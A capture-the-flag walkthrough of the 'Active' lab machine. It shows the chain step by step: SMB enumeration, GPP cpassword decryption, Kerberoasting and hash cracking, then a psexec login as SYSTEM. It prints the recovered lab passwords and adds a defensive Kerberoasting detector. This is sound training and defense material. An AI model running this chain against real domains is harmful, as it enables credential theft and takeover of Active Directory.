Information Gathering

Port Scanning

nmap -sV -sC 10.10.10.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-21 17:27 WIB
Stats: 0:01:10 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
Nmap scan report for 10.10.10.100
Host is up (0.082s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-05-21 10:22:26Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
49165/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2024-05-21T10:23:24
|_  start_date: 2024-05-20T14:33:11
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
|_clock-skew: -5m28s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 72.50 seconds

SMB Folder

smbclient -N -L '\\10.10.10.100\'         
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Replication     Disk      
        SYSVOL          Disk      Logon server share 
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Initial Access

Looking at the SMB shares reachable with an anonymous login, we see a Replication share that contains many folders and files, so let's download all of it to our local machine.

smbclient -N '\\10.10.10.100\Replication'
mask ""
recurse ON
prompt OFF
mget *

Among the downloaded files we find Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml, a Group Policy Preferences file that contains a password in its cpassword attribute.

grep -Ril pass .
./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml

cat ./Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>

The cpassword value is AES-256 encrypted with a key that Microsoft published in its own documentation (the MS14-025 issue), so it can be decrypted offline. Let's decrypt that password:

gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18

Here we get the plaintext password of the svc_tgs user. Next, let's connect to SMB to confirm whether the credential is valid.

smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS%GPPstillStandingStrong2k18

We connected to SMB with that credential successfully, which shows it is valid.

Privilege Escalation

Next, let's Kerberoast with the credential we obtained: GetUserSPNs.py lists the accounts that have a ServicePrincipalName set and, with -request, asks the DC for a service ticket for each of them.

python3 GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.11.0 - Copyright 2023 Fortra

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-19 02:06:40.351723  2024-05-21 17:39:56.537348             



[-] CCache file is not found. Skipping...
[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

Here we get the error Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great), which means our clock is out of sync with the server; the nmap output above already reported a clock-skew of -5m28s, more than the 5-minute tolerance Kerberos allows by default. Let's synchronise it with the following commands:

sudo rdate -n 10.10.10.100 #prints the server's date and time
sudo timedatectl set-ntp false #disable automatic time synchronisation
sudo timedatectl set-time "YYYY-MM-DD HH:MM:SS" #set the clock to the value rdate returned
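To see in advance whether a scan result will run into this error, it helps to turn nmap's clock-skew notation into a number and compare it with the KDC's tolerance. The following is an added example, not code from the original writeup: it parses nmap's h/m/s skew strings, computes the skew from two timestamps, and applies the Windows default of 5 minutes. The scan excerpt it carries is constructed from the clock-skew line above.

```python
import re
from datetime import datetime, timedelta, timezone

# Windows default for "Maximum tolerance for computer clock synchronization".
KERBEROS_MAX_SKEW = timedelta(minutes=5)

# nmap prints skew as an optional sign followed by h/m/s components, e.g. -5m28s, 1h02m03s, 0s.
_SKEW_RE = re.compile(r"^(-)?(?:(\d+)h)?(?:(\d+)m)?(?:(\d+)s)?$")

# Constructed excerpt in the shape of the scan above (only the skew line matters here).
SAMPLE_SCAN = """\
Host script results:
|_clock-skew: -5m28s
"""


def parse_nmap_skew(text):
    """Convert nmap's clock-skew notation into a timedelta (server clock minus ours)."""
    m = _SKEW_RE.match(text.strip())
    if not m or not any(m.group(i) for i in (2, 3, 4)):
        raise ValueError(f"unrecognised skew value: {text!r}")
    neg, hours, minutes, seconds = m.groups()
    delta = timedelta(hours=int(hours or 0), minutes=int(minutes or 0), seconds=int(seconds or 0))
    return -delta if neg else delta


def skew_between(local, server):
    """Skew from two timezone-aware datetimes, e.g. our scan time and the KDC's time."""
    return server.astimezone(timezone.utc) - local.astimezone(timezone.utc)


def skew_between_iso(local_iso, server_iso):
    """Same, from ISO 8601 strings with explicit offsets, e.g. '2024-05-21T17:27:54+07:00'."""
    return skew_between(datetime.fromisoformat(local_iso), datetime.fromisoformat(server_iso))


def kerberos_will_accept(skew):
    """True when |skew| is within tolerance, so the KDC will not answer with KRB_AP_ERR_SKEW."""
    return abs(skew) <= KERBEROS_MAX_SKEW


def check_scan(scan_output):
    """Extract every clock-skew line from nmap output and say whether Kerberos would accept it."""
    results = []
    for line in scan_output.splitlines():
        # Also copes with nmap's "mean: 1h20m00s, deviation: ..." form by taking the first value.
        m = re.search(r"clock-skew:.*?(-?(?:\d+h)?(?:\d+m)?\d+s)", line)
        if m:
            skew = parse_nmap_skew(m.group(1))
            results.append((m.group(1), int(skew.total_seconds()), kerberos_will_accept(skew)))
    return results


if __name__ == "__main__":
    for raw, seconds, ok in check_scan(SAMPLE_SCAN):
        print(f"clock-skew {raw} = {seconds}s, Kerberos accepts: {ok}")
```

The -5m28s reported by nmap is 328 seconds, just outside the 300-second default, which is exactly why the first GetUserSPNs.py run failed; a skew of 4m59s would have gone through unnoticed. On the defender's side, the same check explains why a KDC should be an NTP source for every domain member and why the tolerance should not be widened to paper over drift.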

Next, let's run the same command again:

python3 GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.11.0 - Copyright 2023 Fortra

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-19 02:06:40.351723  2024-05-21 17:39:56.537348             



[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$d1329a37f473f9cc6c3d07e42568cace$[...]

Here we get the TGS hash: a service ticket encrypted with the Administrator account's password-derived key, which can be attacked offline. Let's crack it with hashcat using mode -m 13100 (13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol):

hashcat -m 13100 hash /usr/share/wordlists/rockyou.txt
...
$krb5tgs$23$Administrator$ACTIVE.HTB$active.....:Ticketmaster1968
...
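What this looks like on the domain controller is a 4769 (service ticket requested) event: the requesting account is SVC_TGS, the service name is a user account rather than a machine account, and the ticket encryption type is 0x17 (RC4-HMAC), which is what produces the etype 23 hash that mode 13100 cracks. The detection below is an added example, not part of the original writeup or of any product; the log lines are constructed key=value records that follow the 4769 field names (TargetUserName, ServiceName, TicketEncryptionType, IpAddress, Status), not real EVTX output, and the sqlsvc account and 10.10.14.x addresses in them are made up.

```python
import re
from collections import defaultdict

RC4_HMAC = "0x17"  # TicketEncryptionType value for RC4-HMAC in event 4769

# Constructed sample events in key=value form (not real EVTX output). Field names follow the
# 4769 schema; SVC_TGS and Administrator come from the writeup, sqlsvc and the IPs are invented.
SAMPLE_EVENTS = [
    "EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=Administrator TicketEncryptionType=0x17 IpAddress=::ffff:10.10.14.5 Status=0x0",
    "EventID=4769 TargetUserName=DC$@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:10.10.10.100 Status=0x0",
    "EventID=4769 TargetUserName=jdoe@ACTIVE.HTB ServiceName=DC$ TicketEncryptionType=0x12 IpAddress=::ffff:10.10.14.20 Status=0x0",
    "EventID=4768 TargetUserName=jdoe@ACTIVE.HTB ServiceName=krbtgt TicketEncryptionType=0x12 IpAddress=::ffff:10.10.14.20 Status=0x0",
    "EventID=4769 TargetUserName=SVC_TGS@ACTIVE.HTB ServiceName=sqlsvc TicketEncryptionType=0x17 IpAddress=::ffff:10.10.14.5 Status=0x0",
]


def parse_event(line):
    """Split one key=value record into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def is_kerberoast_candidate(ev):
    """A successfully issued RC4 service ticket for a service that runs under a user account."""
    if ev.get("EventID") != "4769" or ev.get("Status") != "0x0":
        return False
    svc = ev.get("ServiceName", "")
    # Machine accounts end in '$' and the krbtgt service is the TGT itself; both are routine.
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False
    return ev.get("TicketEncryptionType") == RC4_HMAC


def detect(lines):
    """Return the suspicious events and, per requesting account, the distinct services targeted."""
    hits = [ev for ev in map(parse_event, lines) if is_kerberoast_candidate(ev)]
    per_requester = defaultdict(set)
    for ev in hits:
        per_requester[ev["TargetUserName"]].add(ev["ServiceName"])
    return hits, dict(per_requester)


if __name__ == "__main__":
    hits, per_requester = detect(SAMPLE_EVENTS)
    for ev in hits:
        print(f"RC4 service ticket for {ev['ServiceName']} requested by "
              f"{ev['TargetUserName']} from {ev['IpAddress']}")
    for who, services in per_requester.items():
        print(f"{who}: {len(services)} distinct user-account SPN(s) requested")
```

One RC4 ticket for a user-account SPN is worth a look; one account requesting tickets for several such SPNs in a short window is the classic Kerberoasting pattern. The signal is noisier in domains where RC4 is still widely negotiated, so the durable fixes are long random passwords or gMSAs for SPN-bearing accounts and keeping the Administrator account free of SPNs, as the CIFS SPN on it here would have been.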

Here we obtained the Administrator password. Let's try to log in with impacket-psexec:

impacket-psexec administrator:Ticketmaster1968@10.10.10.100

And we get a shell as nt authority\system.